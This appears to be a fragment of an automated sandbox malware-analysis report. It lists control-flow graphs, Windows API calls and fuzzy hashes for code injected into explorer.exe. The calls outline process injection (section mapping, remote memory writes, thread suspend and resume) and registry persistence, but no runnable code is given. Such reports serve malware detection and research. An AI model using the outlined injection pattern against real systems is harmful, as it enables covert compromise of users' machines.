4dcba36-4dcba38 820->828 824->818 829 4dcb87f-4dcb88c 824->829 841 4dcb9bb-4dcb9c3 call 4dcacac 825->841 842 4dcb990-4dcb9b6 call 4da94f0 call 4da1e24 825->842 826->763 843 4dcb930-4dcb935 826->843 828->763 832 4dcb83c-4dcb83d 828->832 833 4dcb88e 829->833 834 4dcb894-4dcb8b9 SetWaitableTimer 829->834 837 4dcb7da-4dcb7dc 830->837 831->837 832->808 833->834 847 4dcb8c5-4dcb8d7 call 4dac134 834->847 839 4dcb9c8-4dcb9ca 837->839 840 4dcb7e2-4dcb813 call 4dc17c8 837->840 850 4dcb837-4dcb838 839->850 851 4dcb9d0-4dcba0d SetWaitableTimer 839->851 840->839 860 4dcb819-4dcb821 840->860 841->773 842->841 843->825 848 4dcb937-4dcb97c call 4dcfd8c call 4da7e24 843->848 864 4dcb8ed-4dcb8f7 847->864 865 4dcb8d9-4dcb8e8 call 4da94f0 847->865 848->825 850->832 851->850 860->850 863 4dcb823-4dcb832 call 4da94f0 860->863 863->850 864->818 869 4dcb8f9 call 4dcfd8c 864->869 865->864 869->818
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887
                                                                                                                                                      • RegOpenKeyA.ADVAPI32 ref: 04DCB5C1
                                                                                                                                                      • RegNotifyChangeKeyValue.KERNEL32 ref: 04DCB6BF
                                                                                                                                                      • SetWaitableTimer.KERNEL32 ref: 04DCB765
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCreateNotifyOpenTimerValueWaitable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 146723190-0
                                                                                                                                                      • Opcode ID: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
                                                                                                                                                      • Instruction ID: e7068205b84ce76802fcbbb610fca5e283110d7dabe1e45eb0793c16f7772532
                                                                                                                                                      • Opcode Fuzzy Hash: 7e0d6ca746b9e6f46bedcdbd6d505a8630fe9095657e2771a051d93914121220
                                                                                                                                                      • Instruction Fuzzy Hash: 109164307186498FEB64DF24D89976AB7E2FB88315F44852ED48AC3191DF78F941CB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 943 4db387c-4db38be 945 4db3a8f 943->945 946 4db38c4-4db3907 943->946 947 4db3a94-4db3ab7 945->947 950 4db3a7b-4db3a8d 946->950 951 4db390d-4db392c 946->951 950->947 951->950 954 4db3932-4db3951 951->954 954->950 956 4db3957-4db3976 954->956 956->950 958 4db397c-4db399b 956->958 958->950 960 4db39a1-4db3a23 call 4da26aa NtCreateSection 958->960 963 4db3a6a-4db3a6f 960->963 964 4db3a25-4db3a42 call 4dbffcc 960->964 968 4db3a71-4db3a73 963->968 969 4db3a60-4db3a68 964->969 970 4db3a44-4db3a5e call 4da26aa 964->970 968->950 971 4db3a75-4db3a79 968->971 969->968 970->968 971->947
                                                                                                                                                      APIs
                                                                                                                                                      • NtCreateSection.NTDLL ref: 04DB3A1E
                                                                                                                                                        • Part of subcall function 04DBFFCC: NtMapViewOfSection.NTDLL ref: 04DC0018
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$CreateView
                                                                                                                                                      • String ID: 0
                                                                                                                                                      • API String ID: 1585966358-4108050209
                                                                                                                                                      • Opcode ID: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                                      • Instruction ID: 0723ffcbf3bd17fee08de955d3479133b6dc56a4145f0cd92d28070c9d854047
                                                                                                                                                      • Opcode Fuzzy Hash: 1b09ba81fbc693a19164b594d56175538ac6b8b8ca3d4d1b7c118079c7b6344a
                                                                                                                                                      • Instruction Fuzzy Hash: F761917061CB09CFDB54EF18D889AA577E5FB98301F10856ED88AC7261EB34E941CBC1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL ref: 04DABAF1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 2167126740-2766056989
                                                                                                                                                      • Opcode ID: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                                      • Instruction ID: 91cbc2bbf120007e05cecd01d9a6b1cfc99c42b365355226d761fd1aa98542b2
                                                                                                                                                      • Opcode Fuzzy Hash: f2b98a115a46b9e14b99d056e6ec68db975ce604077d4ffc8ec3e6b59ad833c6
                                                                                                                                                      • Instruction Fuzzy Hash: 77F09070A19B088FDB549FA8D8CD53976E0F748305F60096DE24AC7254EB78DA49C741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DB076C: RegQueryValueExA.KERNEL32 ref: 04DB07C3
                                                                                                                                                        • Part of subcall function 04DB076C: RegCloseKey.KERNEL32 ref: 04DB0833
                                                                                                                                                      • RtlDeleteBoundaryDescriptor.NTDLL ref: 04DAC1FF
                                                                                                                                                        • Part of subcall function 04DCF04C: CallNamedPipeA.KERNEL32 ref: 04DCF141
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: BoundaryCallCloseDeleteDescriptorNamedPipeQueryValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 615642425-0
                                                                                                                                                      • Opcode ID: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
                                                                                                                                                      • Instruction ID: 32086b6f0d3c159733b9e211464b392d5e80a58f2bee3551fc2767ce5e182eb9
                                                                                                                                                      • Opcode Fuzzy Hash: fe302deaf498671735d961f0a066218eb8c14df84780a904b4dffb1cfaa5c9dd
                                                                                                                                                      • Instruction Fuzzy Hash: 4FA17031728A088FE779EF28D88567AB3E2F789710F64453DD48FC3254DE34A8568782
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 04DAB8FA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                      • Opcode ID: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
                                                                                                                                                      • Instruction ID: 1df32facc04e9a2cc7718e50d7c654e2b6a5e9783ef4ff996723678426ed44e1
                                                                                                                                                      • Opcode Fuzzy Hash: 280b5ea547be97f12bd2d338b9f92d1c614892cb3105043b1a309246ffb6b572
                                                                                                                                                      • Instruction Fuzzy Hash: 50B18130618B098FD768DF1CD885666B7E1FB88311F54492EE98AC3251DB34F852CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtQuerySystemInformation.NTDLL ref: 04DBAD7C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationQuerySystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3562636166-0
                                                                                                                                                      • Opcode ID: 0d84948e6804d05e2878778c5526aa8cb6ccf692f079d4c5b20dfd75fa335d05
                                                                                                                                                      • Instruction ID: 5d2b34f82152eae346380bbff580dde108a073d7270371076defbb5bab67ad74
                                                                                                                                                      • Opcode Fuzzy Hash: 0d84948e6804d05e2878778c5526aa8cb6ccf692f079d4c5b20dfd75fa335d05
                                                                                                                                                      • Instruction Fuzzy Hash: 8C21A230308B098FDB59EF9D98847A577E2FB98311F448069D58AC7324EBB4E841C781
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtQueryInformationProcess.NTDLL ref: 04DB1AEA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationProcessQuery
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1778838933-0
                                                                                                                                                      • Opcode ID: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                                      • Instruction ID: 687dfb8b8af6eefe2d84cbeb49ba1e3bf28d22dfaecd8f2bf67fc3d8f27b20f2
                                                                                                                                                      • Opcode Fuzzy Hash: 1b5ff2e331e8eff1cde1f90d4881bb7eda4a5dda6d44182f68fae4d6ac00e22a
                                                                                                                                                      • Instruction Fuzzy Hash: 3C01A930328E4DCF9BA4DF69D4D8A7973E1FBA9345758056E944AC3120F738E885C741
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1323581903-0
                                                                                                                                                      • Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                                      • Instruction ID: 17e57012b22bbb7807ada4f0fcb1ccc05d9e02f8259fbf986f002438f2a97432
                                                                                                                                                      • Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
                                                                                                                                                      • Instruction Fuzzy Hash: 1601D670A08B048FCB44DF69D0C8569BBE1FB58315B10066FE949C7796DB71D885CB45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryReadVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2834387570-0
                                                                                                                                                      • Opcode ID: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                                      • Instruction ID: a05a1559cbfb0696a8720bb68c6062d7b14dccbb06027ab8d6b4208de6aeeeac
                                                                                                                                                      • Opcode Fuzzy Hash: 3f2a82dcf9ff75e792bad1dcc2e5ed508050df83e28b3dd4d81e6d546fa6ee8d
                                                                                                                                                      • Instruction Fuzzy Hash: CBE09A70728A444BEB10AFB888C823832D0F788315F100839E886C3360E629D8A29202
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • NtWriteVirtualMemory.NTDLL ref: 04DB384F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryVirtualWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3527976591-0
                                                                                                                                                      • Opcode ID: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                                      • Instruction ID: a742667232f2e918776b957c81b7b33ec7eb3667f060cc9f1a295096cfa1d04d
                                                                                                                                                      • Opcode Fuzzy Hash: 85032ad9a9dd339a53993ae2441a8bbbfc633b83b0a06364b991555090b07627
                                                                                                                                                      • Instruction Fuzzy Hash: B9E0DF38B15A418BEB006BB88CC82BC33E1F788301F200839EDC2C3320D729D844A783
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
                                                                                                                                                      • Instruction ID: 6fa61633623f301da9107cbe9f6fe95f315493041868d6fbe02c60fb75f91ee5
                                                                                                                                                      • Opcode Fuzzy Hash: 87212040f7791581802ebfb24c456a6cd4a98c2c83bdb6ee99117a63e13e8226
                                                                                                                                                      • Instruction Fuzzy Hash: F461A331718A48DFDB64EF68D8996A9B3E2F798301F54453DD18BC3650DB34E816CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 426 4dc2b88-4dc2be8 call 4da26aa call 4dae4dc 431 4dc2bea-4dc2bfd call 4db3ab8 426->431 432 4dc2c44-4dc2c86 CreateProcessA 426->432 438 4dc2bff-4dc2c29 431->438 439 4dc2c2b-4dc2c2c 431->439 434 4dc2d3c-4dc2d42 432->434 435 4dc2c8c-4dc2cc7 432->435 443 4dc2d49-4dc2d4c 434->443 441 4dc2cff-4dc2d01 435->441 442 4dc2cc9-4dc2cdb 435->442 444 4dc2c2e-4dc2c41 438->444 439->444 448 4dc2d0c-4dc2d0f 441->448 449 4dc2d03-4dc2d0a 441->449 454 4dc2cdd-4dc2cf0 442->454 455 4dc2cf2 442->455 446 4dc2d4e-4dc2d58 443->446 447 4dc2d60-4dc2d83 443->447 444->432 446->447 451 4dc2d24-4dc2d30 FindCloseChangeNotification 448->451 453 4dc2d11-4dc2d1e GetExitCodeProcess 448->453 449->451 457 4dc2d3a 451->457 453->451 460 4dc2cf8 454->460 455->460 457->443 460->441
                                                                                                                                                      APIs
                                                                                                                                                      • CreateProcessA.KERNEL32 ref: 04DC2C7E
                                                                                                                                                      • GetExitCodeProcess.KERNEL32 ref: 04DC2D1E
                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 04DC2D29
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$ChangeCloseCodeCreateExitFindNotification
                                                                                                                                                      • String ID: h
                                                                                                                                                      • API String ID: 2788277846-2439710439
                                                                                                                                                      • Opcode ID: 4af29ccb7016149927239b4020bbff63ea12dc1f6b6809e811fd2c520dc62f4a
                                                                                                                                                      • Instruction ID: 48bf001ac8043250fdbdcd286f3c656ebf0f5ab8b265748a791ef46397f1d99a
                                                                                                                                                      • Opcode Fuzzy Hash: 4af29ccb7016149927239b4020bbff63ea12dc1f6b6809e811fd2c520dc62f4a
                                                                                                                                                      • Instruction Fuzzy Hash: 4B51767060CB498FE754DF68D8896AAB7E1FB98311F00456EE4CAC3260EF74D581CB82
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 461 4dc0f8c-4dc0fc4 call 4dca864 464 4dc0fca-4dc0fff RegQueryValueExA 461->464 465 4dc1064-4dc106b 461->465 468 4dc1008-4dc1011 call 4dc26b4 464->468 469 4dc1001-4dc1006 464->469 466 4dc106d-4dc1075 465->466 467 4dc10a3-4dc10ab 465->467 470 4dc1099 466->470 471 4dc1077-4dc1097 call 4dc1e58 466->471 472 4dc10ad-4dc10ba call 4db0c48 467->472 473 4dc10c0-4dc10ca 467->473 474 4dc1016-4dc1022 468->474 469->468 469->474 470->467 471->467 471->470 472->473 478 4dc1059-4dc105e RegCloseKey 474->478 479 4dc1024-4dc1057 474->479 478->465 479->478
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DCA864: RegCreateKeyA.ADVAPI32 ref: 04DCA887
                                                                                                                                                      • RegQueryValueExA.KERNEL32 ref: 04DC0FF5
                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 04DC105E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateQueryValue
                                                                                                                                                      • String ID: ($(
                                                                                                                                                      • API String ID: 4083198587-222463766
                                                                                                                                                      • Opcode ID: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                                      • Instruction ID: 66e4fb66c3104e84834ff2f557c5a278bde28774329e9ef458c444ac3ecc83a3
                                                                                                                                                      • Opcode Fuzzy Hash: e12b90d25e48638c248cf623991a1d23c50be5cb427306bedcf9ef54acb60cae
                                                                                                                                                      • Instruction Fuzzy Hash: 8031A4747187998FF305DF54EC987AAB3E5F788304F10861ED44AC3261DB78A549DB42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 637 4da27e8-4da2848 call 4da26aa 640 4da284a-4da2869 637->640 641 4da286c-4da2874 637->641 640->641 642 4da289c-4da28a7 641->642 643 4da2876-4da2896 call 4dc676c 641->643 646 4da28a9-4da28b5 call 4dcadd4 642->646 647 4da28b7-4da28d9 call 4dacca0 642->647 643->642 651 4da2a23-4da2a27 643->651 646->647 656 4da2a1b-4da2a21 647->656 657 4da28df-4da28e5 647->657 654 4da2a29-4da2a2a 651->654 655 4da2a34-4da2a51 651->655 654->655 656->651 658 4da28eb-4da2910 VirtualProtectEx 657->658 659 4da2a14-4da2a19 657->659 661 4da292c 658->661 662 4da2912-4da292a call 4dafb90 658->662 659->651 664 4da292e-4da2930 661->664 662->664 664->656 666 4da2936-4da293c 664->666 667 4da2941-4da297d ResumeThread SuspendThread 666->667 669 4da297f-4da298b 667->669 670 4da2993-4da2995 667->670 669->670 671 4da29a1-4da29a9 670->671 672 4da2997-4da299f 670->672 674 4da29ab-4da29b0 671->674 675 4da29b2-4da29c9 call 4dc676c 671->675 672->667 672->671 676 4da29cb-4da29f8 VirtualProtectEx 674->676 675->676 676->651 679 4da29fa-4da2a12 call 4dafb90 676->679 679->651
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectThreadVirtual$ResumeSuspend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3483329683-0
                                                                                                                                                      • Opcode ID: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                                      • Instruction ID: 940a2c15b2bbf8f9d012331a38c25aa57555837f4d7a179169f6a00486b26b81
                                                                                                                                                      • Opcode Fuzzy Hash: 912752427acc2773dc81b88a95aedc23f4bd7857b4c9cbc1eabf0f137d43b05d
                                                                                                                                                      • Instruction Fuzzy Hash: 0B61C33171CB094FD768EF18E8957AA73E5FB89305F00096DE58AC3291EF34E9458B86
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 723 4db6be4-4db6c50 CreateFileW 724 4db6c52-4db6c5d 723->724 725 4db6cc5-4db6cce 723->725 732 4db6cbf-4db6cc3 724->732 733 4db6c5f-4db6c63 724->733 726 4db6cde-4db6cfd WriteFile 725->726 727 4db6cd0-4db6cd8 SetFilePointer 725->727 728 4db6cff-4db6d0a SetEndOfFile 726->728 729 4db6d0c-4db6d12 726->729 727->726 731 4db6d14-4db6d15 728->731 729->731 734 4db6d1d-4db6d3c 731->734 732->725 732->734 733->732 736 4db6c65-4db6c67 733->736 736->732 737 4db6c69-4db6c80 736->737 739 4db6cba 737->739 740 4db6c82-4db6cb6 737->740 739->732 740->724 742 4db6cb8 740->742 742->732
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$CreatePointerWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3672724799-0
                                                                                                                                                      • Opcode ID: 29e005a1881ecf778232e2a7b5ce6567592faffa3b252627bb797e7c2a1e38ea
                                                                                                                                                      • Instruction ID: 2a0e4e27b94538c6c6d451be31357c6c747184e8f540c848ec0997dd6e26d42b
                                                                                                                                                      • Opcode Fuzzy Hash: 29e005a1881ecf778232e2a7b5ce6567592faffa3b252627bb797e7c2a1e38ea
                                                                                                                                                      • Instruction Fuzzy Hash: E641C8302186044FE7185F1CA88A7B577D1F789315F64522DE4EBC3292EF78D8428686
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 743 4dbe8c8-4dbe8f2 call 4db4dc4 746 4dbea0a-4dbea21 743->746 747 4dbe8f8-4dbe90f call 4dc2e50 743->747 750 4dbe9f6-4dbea02 747->750 751 4dbe915-4dbe932 747->751 750->746 752 4dbe950-4dbe961 751->752 753 4dbe934-4dbe94e 751->753 754 4dbe962-4dbe96d 752->754 753->752 753->754 754->750 755 4dbe973-4dbe9a6 CreateFileA 754->755 755->750 756 4dbe9a8-4dbe9bb SetFilePointer 755->756 757 4dbe9ed-4dbe9f0 FindCloseChangeNotification 756->757 758 4dbe9bd-4dbe9dd ReadFile 756->758 757->750 758->757 759 4dbe9df-4dbe9e4 758->759 759->757 760 4dbe9e6-4dbe9eb 759->760 760->757
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNEL32 ref: 04DBE999
                                                                                                                                                      • SetFilePointer.KERNEL32 ref: 04DBE9B3
                                                                                                                                                      • ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04DC6B1C), ref: 04DBE9D5
                                                                                                                                                      • FindCloseChangeNotification.KERNEL32 ref: 04DBE9F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$ChangeCloseCreateFindNotificationPointerRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2405668454-0
                                                                                                                                                      • Opcode ID: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                                      • Instruction ID: 076196da1517b2d1e88b8133a071d3d0e0bfdf460191df774b2d809b6e283a82
                                                                                                                                                      • Opcode Fuzzy Hash: d48e66415ee8c958f108398a66507d7349109b7993f4cd815dda9dd15392f6da
                                                                                                                                                      • Instruction Fuzzy Hash: B1410C30218A188FDB58DF28D8C4AA977E1FB89315B24866DE19BC7266DF34D447CBC1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 874 4dafeb8-4daff00 call 4da37b8 877 4daff06-4daff07 874->877 878 4daff87-4daff9d 874->878 879 4daff0b-4daff26 call 4db14e8 877->879 882 4db009e-4db00af 878->882 883 4daffa3-4daffb4 878->883 887 4daff28-4daff3d 879->887 888 4daff59-4daff85 879->888 885 4daffba-4daffdf RegOpenKeyA 883->885 886 4db0047-4db0060 call 4dbad14 883->886 889 4db001f-4db0022 885->889 890 4daffe1-4db0019 RegSetValueExA RegCloseKey 885->890 886->882 898 4db0062-4db0073 886->898 887->888 900 4daff3f-4daff54 call 4db6be4 887->900 888->878 888->879 894 4db0029-4db0045 call 4da6818 889->894 895 4db0024-4db0027 889->895 890->889 894->886 895->886 895->894 898->882 904 4db0075-4db0097 call 4dab75c 898->904 900->888 906 4db009c 904->906 906->882
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 04DA37B8: FindFirstFileW.KERNEL32 ref: 04DA38C2
                                                                                                                                                      • RegOpenKeyA.ADVAPI32 ref: 04DAFFD7
                                                                                                                                                      • RegSetValueExA.KERNEL32 ref: 04DB000B
                                                                                                                                                      • RegCloseKey.KERNEL32 ref: 04DB0019
                                                                                                                                                        • Part of subcall function 04DB14E8: CreateFileW.KERNEL32 ref: 04DB1521
                                                                                                                                                        • Part of subcall function 04DB6BE4: CreateFileW.KERNEL32 ref: 04DB6C43
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000020.00000002.1311072101.0000000004DA1000.00000020.00000001.sdmp, Offset: 04DA1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_32_2_4da1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Create$CloseFindFirstOpenValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3325113042-0
                                                                                                                                                      • Opcode ID: 9eea1239f2a7d748ac6b5e741df024244af351a789541025a58a8a0caa0db7c1
                                                                                                                                                      • Instruction ID: de8682e924b794892e94c4b4e1b5284ba71404d9b69c82e80d261763890b7b85
                                                                                                                                                      • Opcode Fuzzy Hash: 9eea1239f2a7d748ac6b5e741df024244af351a789541025a58a8a0caa0db7c1
                                                                                                                                                      • Instruction Fuzzy Hash: BF516F71608A488FEB69EF28D8D4A9A77E1F798304F60492EE04FC3155DF78E5468B81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
